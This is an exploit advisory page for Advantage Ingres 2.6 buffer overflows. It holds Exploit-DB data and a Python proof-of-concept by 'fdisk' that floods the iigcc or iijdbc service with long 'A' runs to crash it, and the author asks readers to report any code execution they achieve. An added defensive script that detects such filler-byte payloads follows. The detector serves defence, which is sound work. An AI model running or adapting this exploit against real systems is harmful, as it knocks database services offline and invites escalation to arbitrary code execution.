Vendor: Advantage Ingres
By: fdisk
CVSS: 7.5 (HIGH)
Type: Denial of Service
CWE: 119, 120, 122, 434
Product Name: Advantage Ingres
Affected Version From: 2.6
Affected Version To: 2.6
Patch Exists: YES
Related CVE: CVE-2007-3334, CVE-2007-3336, CVE-2007-3337, CVE-2007-3338
CPE: a:computer_associates:advantage_ingres:2.6
Platforms Tested: Windows 2003 Server SP1
2010

Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities

This exploit targets the Ingres Database Server included in CA eTrust Secure Content Manager, which is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue. Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file.

Mitigation:

The vulnerability has been fixed in the latest version of the software.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/24585/info

Ingres Database Server included in CA eTrust Secure Content Manager is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue.

Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file.

# Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
# Date: 2010-08-14
# Author: fdisk
# Version: 2.6
# Tested on: Windows 2003 Server SP1 en
# CVE:  CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338
# Notes: Fixed in the last version.
# please let me know if you are/were able to get code execution <rr dot fdisk at gmail dot com>

import socket
import sys

if len(sys.argv) != 4:
    print "Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>"
    print "Vulnerable Services: iigcc, iijdbc"
    sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])
service = sys.argv[3]

if service == "iigcc":
    payload = "\x41" * 2106
elif service == "iijdbc":
    payload = "\x41" * 1066
else:
    print "Vulnerable Services: iigcc, iijdbc"
    sys.exit(1)

payload += "\x42" * 4

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "Sending payload"
s.send(payload)
data = s.recv(1024)
s.close()
print 'Received', repr(data)

print service + " crashed"
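
From the defender's side, the payload this proof of concept sends has a distinctive shape: a long run of one filler byte (2106 or 1066 bytes of 0x41) followed by four bytes of 0x42. The following is an added example, not part of the original advisory or of fdisk's script, showing one way to flag such payloads in captured client data; the 512-byte threshold, the function names and the sample inputs are assumptions constructed for illustration.

```python
# Added defensive example (not part of the original advisory or PoC).
# Flags client payloads dominated by one repeated filler byte, the shape of
# the PoC above: 2106 or 1066 bytes of 0x41 followed by four bytes of 0x42.

MIN_RUN = 512  # assumed threshold; tune against your own legitimate traffic


def longest_run(data: bytes):
    """Return (byte_value, length, offset) of the longest single-byte run."""
    best = (None, 0, 0)
    i = 0
    while i < len(data):
        j = i
        while j < len(data) and data[j] == data[i]:
            j += 1
        if j - i > best[1]:
            best = (data[i], j - i, i)
        i = j
    return best


def inspect_payload(data: bytes, min_run: int = MIN_RUN):
    """Return a finding dict if the payload looks like overflow filler, else None."""
    value, length, offset = longest_run(data)
    if length < min_run:
        return None
    end = offset + length
    return {
        "filler_byte": value,
        "run_length": length,
        "offset": offset,
        "trailer": data[end:end + 4],  # bytes right after the filler run
        "total_length": len(data),
    }


# Constructed sample inputs (not captured traffic).
SAMPLES = {
    "iigcc-shaped": b"\x41" * 2106 + b"\x42" * 4,
    "iijdbc-shaped": b"\x41" * 1066 + b"\x42" * 4,
    "short-benign": b"constructed benign request " + b"\x00" * 16,
    "empty": b"",
}

if __name__ == "__main__":
    for name, payload in SAMPLES.items():
        print(name, inspect_payload(payload))
```

A hit from this heuristic is a lead for triage, not proof of an attack: bulk data with long padding can trigger it, so compare findings against what the iigcc and iijdbc listeners normally receive in your environment.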